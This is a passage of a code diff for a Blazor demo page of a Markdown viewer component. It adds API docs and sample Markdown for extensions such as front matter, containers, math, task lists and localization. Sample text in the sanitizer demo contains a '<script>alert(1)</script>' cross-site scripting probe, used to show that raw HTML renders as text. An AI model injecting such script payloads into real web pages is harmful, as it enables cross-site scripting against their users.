+                    Description = "Resolves every relative link and image destination against baseUrl - what a README needs before it can be rendered anywhere but the repository it came from. Absolute destinations and in-page fragments are left alone.",
+                },
+                new()
+                {
+                    Name = "UseLinkOptions",
+                    Type = "BitMarkdownPipelineBuilder UseLinkOptions(BitMarkdownLinkTarget externalTarget, string? externalRel, BitMarkdownLinkTarget internalTarget, string? internalRel)",
+                    DefaultValue = "",
+                    Description = "Chooses the target and rel a rendered link carries, replacing the defaults (external links open in a new tab with 'noopener noreferrer'). Pass 'noopener noreferrer nofollow ugc' for links a site's own readers wrote.",
+                    LinkType = LinkType.Link,
+                    Href = "#markdown-viewer-link-target-enum",
                 },
                 new()
                 {
@@ -206,7 +356,7 @@ public partial class BitMarkdownViewerDemo
                     Name = "UseAdvanced",
                     Type = "BitMarkdownPipelineBuilder UseAdvanced()",
                     DefaultValue = "",
-                    Description = "Adds the GitHub flavors plus emoji and auto-identifiers.",
+                    Description = "Adds the GitHub flavors plus front matter, the emphasis extras, containers, definition lists, abbreviations, figures, emoji and auto-identifiers.",
                 },
                 new()
                 {
@@ -305,6 +455,154 @@ public partial class BitMarkdownViewerDemo
         },
         new()
         {
+            Id = "markdown-viewer-front-matter-node",
+            Title = "BitMarkdownFrontMatterNode",
+            Description = "The metadata block a document may open with, fenced by --- (YAML) or +++ (TOML). It describes the file rather than belonging to it, so it renders nothing and is read back off the AST. Requires the front matter flavor; without it a leading --- is ordinary Markdown.",
+            Parameters =
+            [
+                new()
+                {
+                    Name = "Fence",
+                    Type = "string",
+                    DefaultValue = "---",
+                    Description = "The fence that opened the block, either --- or +++.",
+                },
+                new()
+                {
+                    Name = "Text",
+                    Type = "string",
+                    DefaultValue = "",
+                    Description = "The raw text between the fences, with the line endings normalized to \n. Hand it to whichever serializer you already use.",
+                },
+                new()
+                {
+                    Name = "IsToml",
+                    Type = "bool",
+                    DefaultValue = "false",
+                    Description = "True when the block was fenced with +++, i.e. TOML rather than YAML.",
+                },
+                new()
+                {
+                    Name = "Find",
+                    Type = "static BitMarkdownFrontMatterNode? Find(BitMarkdownDocumentNode document)",
+                    DefaultValue = "",
+                    Description = "Returns the document's front matter block, or null when it has none.",
+                },
+            ]
+        },
+        new()
+        {
+            Id = "markdown-viewer-task-changed-args",
+            Title = "BitMarkdownViewerTaskChangedEventArgs",
+            Description = "What the viewer reports when a reader ticks or unticks a task-list checkbox.",
+            Parameters =
+            [
+                new()
+                {
+                    Name = "Index",
+                    Type = "int",
+                    DefaultValue = "0",
+                    Description = "The checkbox's position in the document, counted from 0 in reading order.",
+                },
+                new()
+                {
+                    Name = "Checked",
+                    Type = "bool",
+                    DefaultValue = "false",
+                    Description = "Its new state.",
+                },
+                new()
+                {
+                    Name = "Markdown",
+                    Type = "string",
+                    DefaultValue = "",
+                    Description = "The source with that one marker rewritten, ready to be stored. Produced by BitMarkdownTaskList.Toggle, which counts the same markers the viewer drew and skips any inside code blocks.",
+                },
+            ]
+        },
+        new()
+        {
+            Id = "markdown-viewer-url-rewrite-context",
+            Title = "BitMarkdownUrlRewriteContext",
+            Description = "What a URL rewriter is told about the destination it is being asked to rewrite.",
+            Parameters =
+            [
+                new()
+                {
+                    Name = "Url",
+                    Type = "string",
+                    DefaultValue = "",
+                    Description = "The sanitized destination, exactly as it would otherwise be rendered.",
+                },
+                new()
+                {
+                    Name = "IsImage",
+                    Type = "bool",
+                    DefaultValue = "false",
+                    Description = "True for an image source, false for a link destination.",
+                },
+                new()
+                {
+                    Name = "IsRelative",
+                    Type = "bool",
+                    DefaultValue = "false",
+                    Description = "True when the URL has no scheme and does not begin with '//'. An in-page fragment (#section) is not relative in this sense, since resolving it elsewhere would break every heading link in the document.",
+                },
+            ]
+        },
+        new()
+        {
+            Id = "markdown-viewer-texts",
+            Title = "BitMarkdownTexts",
+            Description = "The words the renderers write into a document themselves, rather than taking them from the source. All strings default to English. The numbered ones take their number through {0}; FootnoteBackReferenceOccurrence takes the footnote's number and the citation's through {0} and {1}.",
+            Parameters =
+            [
+                new() { Name = "AlertNote", Type = "string", DefaultValue = "Note", Description = "The title of a > [!NOTE] alert." },
+                new() { Name = "AlertTip", Type = "string", DefaultValue = "Tip", Description = "The title of a > [!TIP] alert." },
+                new() { Name = "AlertImportant", Type = "string", DefaultValue = "Important", Description = "The title of a > [!IMPORTANT] alert." },
+                new() { Name = "AlertWarning", Type = "string", DefaultValue = "Warning", Description = "The title of a > [!WARNING] alert." },
+                new() { Name = "AlertCaution", Type = "string", DefaultValue = "Caution", Description = "The title of a > [!CAUTION] alert." },
+                new() { Name = "Footnotes", Type = "string", DefaultValue = "Footnotes", Description = "The accessible name of the footnotes section." },
+                new() { Name = "FootnoteBackReference", Type = "string", DefaultValue = "Back to reference {0}", Description = "The accessible name of a footnote's back-link, given the footnote's number." },
+                new() { Name = "FootnoteBackReferenceOccurrence", Type = "string", DefaultValue = "Back to reference {0}-{1}", Description = "The accessible name of one of several back-links on the same footnote, given the footnote's number and the citation's." },
+                new() { Name = "Table", Type = "string", DefaultValue = "Table", Description = "The accessible name of the scrollable region a table sits in." },
+                new() { Name = "PermalinkTo", Type = "string", DefaultValue = "Permalink to {0}", Description = "The accessible name of a heading's permalink, given the heading's text." },
+                new() { Name = "PermalinkToSection", Type = "string", DefaultValue = "Permalink to this section", Description = "The accessible name of a permalink whose heading has no text of its own." },
+                new() { Name = "Task", Type = "string", DefaultValue = "Task {0}", Description = "The accessible name of an interactive task-list checkbox, given its number." },
+            ]
+        },
+        new()
+        {
+            Id = "markdown-viewer-ast-helper",
+            Title = "BitMarkdownAstHelper",
+            Description = "Helpers for reading and rewriting a parsed document. Every walk here is iterative, so even a pathologically nested document cannot overflow the stack.",
+            Parameters =
+            [
+                new()
+                {
+                    Name = "Descendants",
+                    Type = "static IEnumerable<BitMarkdownNode> Descendants(BitMarkdownNode node)",
+                    DefaultValue = "",
+                    Description = "Enumerates every node in the tree, in document order, excluding the root.",
+                },
+                new()
+                {
+                    Name = "VisitChildLists",
+                    Type = "static void VisitChildLists(BitMarkdownNode node, Action<IList<BitMarkdownNode>> action)",
+                    DefaultValue = "",
+                    Description = "Invokes the action for every child collection in the tree, depth-first. The action may add, remove or replace entries in place, which is how an AST processor rewrites the tree.",
+                },
+                new()
+                {
+                    Name = "ToPlainText",
+                    Type = "static string ToPlainText(BitMarkdownNode node)",
+                    DefaultValue = "",
+                    Description = "Renders the subtree as plain text: what the document says, with none of the markup it says it with and none of the link destinations. Blocks are separated by a blank line. This is the text a search index, an excerpt or a meta description is built from.",
+                },
+            ]
+        },
+        new()
+        {
             Id = "markdown-viewer-renderer",
             Title = "BitMarkdownRenderer",
             Description = "Walks an AST and dispatches each node to a matching node renderer. Renderers are probed in reverse registration order, so the last renderer registered for a node type wins, allowing pipeline extensions to override the core renderers.",
@@ -355,6 +653,19 @@ public partial class BitMarkdownViewerDemo
                     Description = "No image is allowed to load; every image source is stripped and only the alt text remains. The strictest option.",
                     Value = "2",
                 },
+            ]
+        },
+        new()
+        {
+            Id = "markdown-viewer-link-target-enum",
+            Name = "BitMarkdownLinkTarget",
+            Description = "Where a link opens, i.e. the target attribute it is rendered with.",
+            Items =
+            [
+                new() { Name = "Self", Description = "No target at all: the link opens in the same browsing context.", Value = "0" },
+                new() { Name = "Blank", Description = "Opens in a new tab or window (_blank).", Value = "1" },
+                new() { Name = "Parent", Description = "Opens in the parent browsing context (_parent).", Value = "2" },
+                new() { Name = "Top", Description = "Opens in the topmost browsing context (_top).", Value = "3" },
             ]
         },
         new()
@@ -449,6 +760,169 @@ sign written as a number, and &#x2705; as hex. Inside code they stay literal:
 
 
 
+    // -- Emphasis extras example ---------------------------------------------
+
+    private readonly BitMarkdownPipeline emphasisExtrasPipeline = new BitMarkdownPipelineBuilder()
+        .UseEmphasisExtras()
+        .Build();
+
+    private readonly string emphasisExtrasMarkdown = @"Water is H~2~O, the area of a circle is πr^2^, and 2^10^ = 1024.
+
+This release ++adds streaming++ and ~~drops the old overload~~, so ==read the migration notes== first.
+
+Ordinary prose is left alone: 1 + 2 = 3, and a+b is not inserted text.
+";
+
+
+
+    // -- Typography example --------------------------------------------------
+
+    private readonly BitMarkdownPipeline smartyPantsPipeline = new BitMarkdownPipelineBuilder()
+        .UseSmartyPants()
+        .Build();
+
+    private readonly string typographyMarkdown = @"""Typography matters,"" she said -- and it's hard to disagree...
+
+The 2024--2026 range uses an en dash; an aside uses an em dash --- like this one.
+
+Code keeps every character: `--- ""not curled"" ...`
+";
+
+
+
+    // -- Front matter example ------------------------------------------------
+
+    private readonly BitMarkdownPipeline frontMatterPipeline = new BitMarkdownPipelineBuilder()
+        .UseFrontMatter()
+        .Build();
+
+    private string frontMatterText = string.Empty;
+
+    private void HandleFrontMatterParsed(BitMarkdownDocumentNode document)
+    {
+        var frontMatter = BitMarkdownFrontMatterNode.Find(document);
+        frontMatterText = frontMatter is null ? "(none)" : frontMatter.Text.ReplaceLineEndings(" | ");
+    }
+
+    private readonly string frontMatterMarkdown = @"---
+title: Release notes
+date: 2026-09-09
+tags: [blazor, markdown]
+---
+
+# Release notes
+
+The metadata above describes the file; it is not part of the document.
+";
+
+
+
+    // -- Containers example --------------------------------------------------
+
+    private readonly BitMarkdownPipeline containersPipeline = new BitMarkdownPipelineBuilder()
+        .UseContainers()
+        .Build();
+
+    private readonly string containersMarkdown = @":::tip Start here
+Containers are fenced with three colons. The first word names the container.
+:::
+
+:::warning Read this first
+The rest of the line is the title, and the body is **ordinary Markdown**.
+
+:::note
+Containers nest, so an aside can sit inside one.
+:::
+
+:::
+
+:::details How the fence is read
+The word after the fence names the container; the rest of the line is its title.
+
+This one is a real `<details>`, so it opens and closes.
+:::
+
+:::glossary
+A name the stylesheet has no opinion about is a plain block you style yourself.
+:::
+";
+
+
+
+    // -- Definition list example ---------------------------------------------
+
+    private readonly BitMarkdownPipeline definitionListPipeline = new BitMarkdownPipelineBuilder()
+        .UseDefinitionLists()
+        .Build();
+
+    private readonly string definitionListMarkdown = @"Pipeline
+: The immutable set of flavors a document is parsed with.
+: Build it once and share it.
+
+AST
+: The tree of headings, paragraphs and inline runs the parser produces.
+
+    A definition indented under its own text may run to several paragraphs,
+    or hold a list:
+
+    - one
+    - two
+";
+
+
+
+    // -- Abbreviations example -----------------------------------------------
+
+    private readonly BitMarkdownPipeline abbreviationPipeline = new BitMarkdownPipelineBuilder()
+        .UseAbbreviations()
+        .Build();
+
+    private readonly string abbreviationMarkdown = @"*[HTML]: HyperText Markup Language
+*[AST]: Abstract Syntax Tree
+*[CSP]: Content Security Policy
+
+The parser builds an AST and the renderer writes HTML from it, which is what keeps
+the output usable under a strict CSP.
+
+Only whole words are expanded, so HTMLElement keeps its own name and `HTML` inside
+code stays literal.
+";
+
+
+
+    // -- Mathematics example -------------------------------------------------
+
+    private readonly BitMarkdownPipeline mathPipeline = new BitMarkdownPipelineBuilder()
+        .UseMathematics()
+        .Build();
+
+    private readonly string mathMarkdown = @"Euler's identity, $e^{i\pi} + 1 = 0$, in one line.
+
+$$
+\int_0^1 x^2 \, dx = \frac{1}{3}
+$$
+
+Without a typesetter on the page the TeX reads as itself. Prices are left alone:
+this costs $5 and that one $10.
+";
+
+
+
+    // -- Figures example -----------------------------------------------------
+
+    private readonly BitMarkdownPipeline figurePipeline = new BitMarkdownPipelineBuilder()
+        .UseFigures()
+        .Build();
+
+    private readonly string figureMarkdown = @"![The bit platform logo](/images/bit-logo-blue.png ""The logo, as a captioned figure"")
+
+An image with no title stays an ordinary image:
+
+![The bit platform logo](/images/bit-logo-blue.png)
+";
+
+
+
     // -- Line breaks example -------------------------------------------------
 
     private readonly BitMarkdownPipeline softBreakPipeline = new BitMarkdownPipelineBuilder()
@@ -519,6 +993,8 @@ Raw <b>HTML</b> and <script>alert(1)</script> are rendered as text.
 
     private List<TocEntry> tocEntries = [];
 
+    private string tocExcerpt = string.Empty;
+
     private void HandleParsed(BitMarkdownDocumentNode document)
     {
         tocEntries = BitMarkdownAstHelper.Descendants(document)
@@ -526,6 +1002,9 @@ Raw <b>HTML</b> and <script>alert(1)</script> are rendered as text.
                                          .Where(h => string.IsNullOrEmpty(h.Id) is false)
                                          .Select(h => new TocEntry(h.Level, h.Id!, BitMarkdownInlineHelpers.PlainText(h.Inlines)))
                                          .ToList();
+
+        var text = BitMarkdownAstHelper.ToPlainText(document).ReplaceLineEndings(" ");
+        tocExcerpt = text.Length > 120 ? text[..120] + "..." : text;
     }
 
     private readonly string tocMarkdown = @"# Release notes
@@ -545,6 +1024,130 @@ Truncation no longer splits a surrogate pair.
 ### Added
 
 The whole native parser.
+";
+
+
+
+    // -- Heading anchors example ---------------------------------------------
+
+    private readonly BitMarkdownPipeline anchorsPipeline = new BitMarkdownPipelineBuilder()
+        .UseAutoIdentifiers(anchorLinks: true)
+        .Build();
+
+    private readonly string anchorsMarkdown = @"## Installation {#install}
+
+Hover a heading to reveal the permalink beside it. This one names its own id, so the
+link to it survives a rewording of the heading.
+
+### Package manager
+
+### .NET CLI
+";
+
+
+
+    // -- Templates example ---------------------------------------------------
+
+    private readonly string templatesMarkdown = @"Every code block below is drawn by the template, not by the viewer:
+
+```csharp
+var pipeline = new BitMarkdownPipelineBuilder().UseGitHubFlavored().Build();
+```
+
+```bash
+dotnet add package Bit.BlazorUI.Extras
+```
+
+And every link, like [the bit platform](https://bitplatform.dev), gets its own chrome.
+";
+
+
+
+    // -- Interactive task lists example --------------------------------------
+
+    private string taskListMarkdown = @"## Release checklist
+
+- [x] Write the parser
+- [x] Write the renderer
+- [ ] Write the docs
+- [ ] Ship it
+
+Nested items count too:
+
+- [ ] Polish
+    - [ ] Icons
+    - [ ] Copy
+";
+
+    private string taskListStatus = "Tick a box to see the rewritten source.";
+
+    private void HandleTaskChanged(BitMarkdownViewerTaskChangedEventArgs args)
+    {
+        // The viewer hands over the new source; storing it is what makes the change stick.
+        taskListMarkdown = args.Markdown;
+        taskListStatus = $"Task {args.Index + 1} is now {(args.Checked ? "done" : "open")}.";
+    }
+
+
+
+    // -- Link policy example -------------------------------------------------
+
+    private readonly BitMarkdownPipeline linkPolicyPipeline = new BitMarkdownPipelineBuilder()
+        .UseLinkOptions(externalTarget: BitMarkdownLinkTarget.Self,
+                        externalRel: "noopener noreferrer nofollow ugc")
+        .Build();
+
+    private readonly string linkPolicyMarkdown = @"A link a reader wrote to [somewhere else](https://example.com)
+opens in the same tab and is marked `nofollow ugc`.
+
+A link to [another page here](/components/markdownviewer) is untouched, and so is one to
+[a section](#example1) of this page.
+";
+
+
+
+    // -- Rewriting URLs example ----------------------------------------------
+
+    private readonly BitMarkdownPipeline baseUrlPipeline = new BitMarkdownPipelineBuilder()
+        .UseBaseUrl("/images/")
+        .Build();
+
+    private readonly string baseUrlMarkdown = @"![the bit logo](bit-logo-blue.png)
+
+The image above is written with a relative path, the way a README in a repository writes one.
+An [absolute link](https://bitplatform.dev) is left alone.
+";
+
+
+
+    // -- Localization example ------------------------------------------------
+
+    private readonly BitMarkdownPipeline localizedPipeline = new BitMarkdownPipelineBuilder()
+        .UseGitHubFlavored()
+        .UseTexts(new BitMarkdownTexts
+        {
+            AlertNote = "توجه",
+            AlertTip = "نکته",
+            AlertImportant = "مهم",
+            AlertWarning = "هشدار",
+            AlertCaution = "احتیاط",
+            Footnotes = "پی‌نوشت‌ها",
+            FootnoteBackReference = "بازگشت به ارجاع {0}",
+            FootnoteBackReferenceOccurrence = "بازگشت به ارجاع {0}-{1}",
+            Table = "جدول",
+        })
+        .Build();
+
+    private readonly string localizedMarkdown = @"> [!WARNING]
+> عنوان این کادر از تنظیمات زبان خوانده می‌شود، نه از متن.
+
+جدول و پی‌نوشت هم نام‌های خودشان را از همان‌جا می‌گیرند[^۱].
+
+| ستون | مقدار |
+|:-----|------:|
+| یک   |     ۱ |
+
+[^۱]: نام پیوند بازگشت هم ترجمه شده است.
 ";
 
 
@@ -572,7 +1175,7 @@ The whole native parser.
     {
         MarkdownFlavor.Basic => "Basic CommonMark only - reference links and character references still work, but tables, strikethrough, task lists, footnotes, alerts, emoji and bare URLs render as plain text.",
         MarkdownFlavor.GitHub => "The GitHub flavors: pipe tables, ~~strikethrough~~, task lists, autolink literals, footnotes and alerts.",
-        _ => "Advanced: the GitHub flavors plus :sparkles: emoji and automatic heading ids."
+        _ => "Advanced: the GitHub flavors plus front matter, the emphasis extras (~sub~, ^sup^, ++ins++, ==mark==), :::containers, definition lists, abbreviations, figures, :sparkles: emoji and automatic heading ids."
     };
 
     private const string SampleMarkdown = """
@@ -591,6 +1194,7 @@ The whole native parser.
 
         - Headings (ATX `#` and Setext)
         - **Bold**, *italic*, ***bold italic***, and ~~strikethrough~~
+        - H~2~O, x^2^, ++inserted++ and ==highlighted== (the emphasis extras)
         - `inline code` and fenced code blocks
         - [Links](https://learn.microsoft.com/aspnet/core/blazor) and images
         - Ordered and unordered lists, including nesting:
@@ -764,6 +1368,180 @@ sign written as a number, and &#x2705; as hex. Inside code they stay literal:
 "";";
 
     private readonly string example6RazorCode = @"
+<BitMarkdownViewer Markdown=""@emphasisExtrasMarkdown"" Pipeline=""@emphasisExtrasPipeline"" />";
+    private readonly string example6CsharpCode = @"
+private readonly BitMarkdownPipeline emphasisExtrasPipeline = new BitMarkdownPipelineBuilder()
+    .UseEmphasisExtras()
+    .Build();
+
+private readonly string emphasisExtrasMarkdown = @""Water is H~2~O, the area of a circle is πr^2^, and 2^10^ = 1024.
+
+This release ++adds streaming++ and ~~drops the old overload~~, so ==read the migration notes== first.
+
+Ordinary prose is left alone: 1 + 2 = 3, and a+b is not inserted text.
+"";";
+
+    private readonly string example7RazorCode = @"
+<div class=""mdv-columns"">
+    <div class=""mdv-column"">
+        <div class=""mdv-column-title"">Default</div>
+        <BitMarkdownViewer Markdown=""@typographyMarkdown"" />
+    </div>
+    <div class=""mdv-column"">
+        <div class=""mdv-column-title"">UseSmartyPants()</div>
+        <BitMarkdownViewer Markdown=""@typographyMarkdown"" Pipeline=""@smartyPantsPipeline"" />
+    </div>
+</div>";
+    private readonly string example7CsharpCode = @"
+private readonly BitMarkdownPipeline smartyPantsPipeline = new BitMarkdownPipelineBuilder()
+    .UseSmartyPants()
+    .Build();
+
+private readonly string typographyMarkdown = @""""""Typography matters,"""" she said -- and it's hard to disagree...
+
+The 2024--2026 range uses an en dash; an aside uses an em dash --- like this one.
+
+Code keeps every character: `--- """"not curled"""" ...`
+"";";
+
+    private readonly string example8RazorCode = @"
+<div class=""mdv-columns"">
+    <div class=""mdv-column"">
+        <div class=""mdv-column-title"">Default</div>
+        <BitMarkdownViewer Markdown=""@frontMatterMarkdown"" />
+    </div>
+    <div class=""mdv-column"">
+        <div class=""mdv-column-title"">UseFrontMatter()</div>
+        <BitMarkdownViewer Markdown=""@frontMatterMarkdown"" Pipeline=""@frontMatterPipeline"" OnParsed=""HandleFrontMatterParsed"" />
+        <div class=""mdv-hint"">Metadata read from the AST: @frontMatterText</div>
+    </div>
+</div>";
+    private readonly string example8CsharpCode = @"
+private readonly BitMarkdownPipeline frontMatterPipeline = new BitMarkdownPipelineBuilder()
+    .UseFrontMatter()
+    .Build();
+
+private string frontMatterText = string.Empty;
+
+private void HandleFrontMatterParsed(BitMarkdownDocumentNode document)
+{
+    var frontMatter = BitMarkdownFrontMatterNode.Find(document);
+    frontMatterText = frontMatter is null ? ""(none)"" : frontMatter.Text.ReplaceLineEndings("" | "");
+}
+
+private readonly string frontMatterMarkdown = @""---
+title: Release notes
+date: 2026-09-09
+tags: [blazor, markdown]
+---
+
+# Release notes
+
+The metadata above describes the file; it is not part of the document.
+"";";
+
+    private readonly string example9RazorCode = @"
+<BitMarkdownViewer Markdown=""@containersMarkdown"" Pipeline=""@containersPipeline"" />";
+    private readonly string example9CsharpCode = @"
+private readonly BitMarkdownPipeline containersPipeline = new BitMarkdownPipelineBuilder()
+    .UseContainers()
+    .Build();
+
+private readonly string containersMarkdown = @"":::tip Start here
+Containers are fenced with three colons. The first word names the container.
+:::
+
+:::warning Read this first
+The rest of the line is the title, and the body is **ordinary Markdown**.
+
+:::note
+Containers nest, so an aside can sit inside one.
+:::
+
+:::
+
+:::details How the fence is read
+The word after the fence names the container; the rest of the line is its title.
+
+This one is a real `<details>`, so it opens and closes.
+:::
+
+:::glossary
+A name the stylesheet has no opinion about is a plain block you style yourself.
+:::
+"";";
+
+    private readonly string example10RazorCode = @"
+<BitMarkdownViewer Markdown=""@definitionListMarkdown"" Pipeline=""@definitionListPipeline"" />";
+    private readonly string example10CsharpCode = @"
+private readonly BitMarkdownPipeline definitionListPipeline = new BitMarkdownPipelineBuilder()
+    .UseDefinitionLists()
+    .Build();
+
+private readonly string definitionListMarkdown = @""Pipeline
+: The immutable set of flavors a document is parsed with.
+: Build it once and share it.
+
+AST
+: The tree of headings, paragraphs and inline runs the parser produces.
+
+    A definition indented under its own text may run to several paragraphs,
+    or hold a list:
+
+    - one
+    - two
+"";";
+
+    private readonly string example11RazorCode = @"
+<BitMarkdownViewer Markdown=""@abbreviationMarkdown"" Pipeline=""@abbreviationPipeline"" />";
+    private readonly string example11CsharpCode = @"
+private readonly BitMarkdownPipeline abbreviationPipeline = new BitMarkdownPipelineBuilder()
+    .UseAbbreviations()
+    .Build();
+
+private readonly string abbreviationMarkdown = @""*[HTML]: HyperText Markup Language
+*[AST]: Abstract Syntax Tree
+*[CSP]: Content Security Policy
+
+The parser builds an AST and the renderer writes HTML from it, which is what keeps
+the output usable under a strict CSP.
+
+Only whole words are expanded, so HTMLElement keeps its own name and `HTML` inside
+code stays literal.
+"";";
+
+    private readonly string example12RazorCode = @"
+<BitMarkdownViewer Markdown=""@mathMarkdown"" Pipeline=""@mathPipeline"" />";
+    private readonly string example12CsharpCode = @"
+private readonly BitMarkdownPipeline mathPipeline = new BitMarkdownPipelineBuilder()
+    .UseMathematics()
+    .Build();
+
+private readonly string mathMarkdown = @""Euler's identity, $e^{i\pi} + 1 = 0$, in one line.
+
+$$
+\int_0^1 x^2 \, dx = \frac{1}{3}
+$$
+
+Without a typesetter on the page the TeX reads as itself. Prices are left alone:
+this costs $5 and that one $10.
+"";";
+
+    private readonly string example13RazorCode = @"
+<BitMarkdownViewer Markdown=""@figureMarkdown"" Pipeline=""@figurePipeline"" />";
+    private readonly string example13CsharpCode = @"
+private readonly BitMarkdownPipeline figurePipeline = new BitMarkdownPipelineBuilder()
+    .UseFigures()
+    .Build();
+
+private readonly string figureMarkdown = @""![The bit platform logo](/images/bit-logo-blue.png """"The logo, as a captioned figure"""")
+
+An image with no title stays an ordinary image:
+
+![The bit platform logo](/images/bit-logo-blue.png)
+"";";
+
+    private readonly string example14RazorCode = @"
 <div class=""mdv-columns"">
     <div class=""mdv-column"">
         <div class=""mdv-column-title"">Default</div>
@@ -774,7 +1552,7 @@ sign written as a number, and &#x2705; as hex. Inside code they stay literal:
         <BitMarkdownViewer Markdown=""@lineBreaksMarkdown"" Pipeline=""@softBreakPipeline"" />
     </div>
 </div>";
-    private readonly string example6CsharpCode = @"
+    private readonly string example14CsharpCode = @"
 private readonly BitMarkdownPipeline softBreakPipeline = new BitMarkdownPipelineBuilder()
     .UseSoftLineAsHardLine()
     .Build();
@@ -784,9 +1562,9 @@ Violets are blue
 Markdown reflows
 Unless you tell it not to"";";
 
-    private readonly string example7RazorCode = @"
+    private readonly string example15RazorCode = @"
 <BitMarkdownViewer Markdown=""@customMarkdown"" Pipeline=""customPipeline"" />";
-    private readonly string example7CsharpCode = @"
+    private readonly string example15CsharpCode = @"
 private readonly BitMarkdownPipeline customPipeline = new BitMarkdownPipelineBuilder()
     .UsePipeTables()
     .UseStrikethrough()
@@ -805,7 +1583,7 @@ Autolinks were left out, so https://bitplatform.dev stays plain text.
 - [ ] Anything left to do?
 "";";
 
-    private readonly string example8RazorCode = @"
+    private readonly string example16RazorCode = @"
 <div class=""mdv-toolbar"">
     <span class=""mdv-label"">ImageRendering:</span>
     @foreach (var mode in imageRenderingModes)
@@ -821,7 +1599,7 @@ Autolinks were left out, so https://bitplatform.dev stays plain text.
                    ImageRendering=""@imageRendering""
                    StripBidiControlCharacters=""true""
                    MaxLength=""100000"" />";
-    private readonly string example8CsharpCode = @"
+    private readonly string example16CsharpCode = @"
 private static readonly BitMarkdownViewerImageRendering[] imageRenderingModes =
 [
     BitMarkdownViewerImageRendering.SameOrigin,
@@ -847,7 +1625,7 @@ Unsafe URLs never survive the sanitizer, whatever the policy:
 Raw <b>HTML</b> and <script>alert(1)</script> are rendered as text.
 "";";
 
-    private readonly string example9RazorCode = @"
+    private readonly string example17RazorCode = @"
 <div class=""mdv-toc-layout"">
     <nav class=""mdv-toc"" aria-label=""On this page"">
         <div class=""mdv-toc-title"">On this page</div>
@@ -857,11 +1635,14 @@ Raw <b>HTML</b> and <script>alert(1)</script> are rendered as text.
         }
     </nav>
     <BitMarkdownViewer Markdown=""@tocMarkdown"" Pipeline=""BitMarkdownPipelines.Advanced"" OnParsed=""HandleParsed"" />
-</div>";
-    private readonly string example9CsharpCode = @"
+</div>
+<div>Excerpt: @tocExcerpt</div>";
+    private readonly string example17CsharpCode = @"
 private record TocEntry(int Level, string Id, string Text);
 
 private List<TocEntry> tocEntries = [];
+
+private string tocExcerpt = string.Empty;
 
 private void HandleParsed(BitMarkdownDocumentNode document)
 {
@@ -870,6 +1651,9 @@ private void HandleParsed(BitMarkdownDocumentNode document)
                                      .Where(h => string.IsNullOrEmpty(h.Id) is false)
                                      .Select(h => new TocEntry(h.Level, h.Id!, BitMarkdownInlineHelpers.PlainText(h.Inlines)))
                                      .ToList();
+
+    var text = BitMarkdownAstHelper.ToPlainText(document).ReplaceLineEndings("" "");
+    tocExcerpt = text.Length > 120 ? text[..120] + ""..."" : text;
 }
 
 private readonly string tocMarkdown = @""# Release notes
@@ -891,7 +1675,139 @@ Truncation no longer splits a surrogate pair.
 The whole native parser.
 "";";
 
-    private readonly string example10RazorCode = @"
+    private readonly string example18RazorCode = @"
+<BitMarkdownViewer Markdown=""@anchorsMarkdown"" Pipeline=""@anchorsPipeline"" />";
+    private readonly string example18CsharpCode = @"
+private readonly BitMarkdownPipeline anchorsPipeline = new BitMarkdownPipelineBuilder()
+    .UseAutoIdentifiers(anchorLinks: true)
+    .Build();
+
+private readonly string anchorsMarkdown = @""## Installation {#install}
+
+Hover a heading to reveal the permalink beside it. This one names its own id, so the
+link to it survives a rewording of the heading.
+
+### Package manager
+
+### .NET CLI
+"";";
+
+    private readonly string example19RazorCode = @"
+Formatting a value in place:
+<BitMarkdownViewer Inline Markdown=""@(""the **fastest** path is `Span<T>` - [read why](https://learn.microsoft.com/dotnet/api/system.span-1)"")"" />";
+
+    private readonly string example20RazorCode = @"
+<BitMarkdownViewer Markdown=""@templatesMarkdown"" Pipeline=""BitMarkdownPipelines.GitHub"">
+    <CodeBlockTemplate>
+        <div class=""code-card"">
+            <div class=""code-card-head"">
+                <span>@(context.Info ?? ""text"")</span>
+                <BitButton Size=""BitSize.Small"" Variant=""BitVariant.Text"" IconName=""@BitIconName.Copy"" Title=""Copy"" />
+            </div>
+            <pre><code>@context.Content</code></pre>
+        </div>
+    </CodeBlockTemplate>
+    <LinkTemplate>
+        <BitLink Href=""@context.Url"">
+            @BitMarkdownInlineHelpers.PlainText(context.Children)
+            <BitIcon IconName=""@BitIconName.NavigateExternalInline"" />
+        </BitLink>
+    </LinkTemplate>
+</BitMarkdownViewer>";
+
+    private readonly string example21RazorCode = @"
+<BitMarkdownViewer Markdown=""@taskListMarkdown""
+                   Pipeline=""BitMarkdownPipelines.GitHub""
+                   OnTaskChanged=""HandleTaskChanged"" />
+<div>@taskListStatus</div>";
+    private readonly string example21CsharpCode = @"
+private string taskListMarkdown = @""## Release checklist
+
+- [x] Write the parser
+- [x] Write the renderer
+- [ ] Write the docs
+- [ ] Ship it
+
+Nested items count too:
+
+- [ ] Polish
+    - [ ] Icons
+    - [ ] Copy
+"";
+
+private string taskListStatus = ""Tick a box to see the rewritten source."";
+
+private void HandleTaskChanged(BitMarkdownViewerTaskChangedEventArgs args)
+{
+    // The viewer hands over the new source; storing it is what makes the change stick.
+    taskListMarkdown = args.Markdown;
+    taskListStatus = $""Task {args.Index + 1} is now {(args.Checked ? ""done"" : ""open"")}."";
+}";
+
+    private readonly string example22RazorCode = @"
+<BitMarkdownViewer Markdown=""@linkPolicyMarkdown"" Pipeline=""@linkPolicyPipeline"" />";
+    private readonly string example22CsharpCode = @"
+private readonly BitMarkdownPipeline linkPolicyPipeline = new BitMarkdownPipelineBuilder()
+    .UseLinkOptions(externalTarget: BitMarkdownLinkTarget.Self,
+                    externalRel: ""noopener noreferrer nofollow ugc"")
+    .Build();
+
+private readonly string linkPolicyMarkdown = @""A link a reader wrote to [somewhere else](https://example.com)
+opens in the same tab and is marked `nofollow ugc`.
+
+A link to [another page here](/components/markdownviewer) is untouched, and so is one to
+[a section](#example1) of this page.
+"";";
+
+    private readonly string example23RazorCode = @"
+<div class=""mdv-columns"">
+    <div class=""mdv-column"">
+        <div class=""mdv-column-title"">Default</div>
+        <BitMarkdownViewer Markdown=""@baseUrlMarkdown"" ImageRendering=""BitMarkdownViewerImageRendering.All"" />
+    </div>
+    <div class=""mdv-column"">
+        <div class=""mdv-column-title"">UseBaseUrl(...)</div>
+        <BitMarkdownViewer Markdown=""@baseUrlMarkdown"" Pipeline=""@baseUrlPipeline"" ImageRendering=""BitMarkdownViewerImageRendering.All"" />
+    </div>
+</div>";
+    private readonly string example23CsharpCode = @"
+private readonly BitMarkdownPipeline baseUrlPipeline = new BitMarkdownPipelineBuilder()
+    .UseBaseUrl(""/images/"")
+    .Build();
+
+// The general form, for a CDN or for stripping tracking parameters:
+// new BitMarkdownPipelineBuilder()
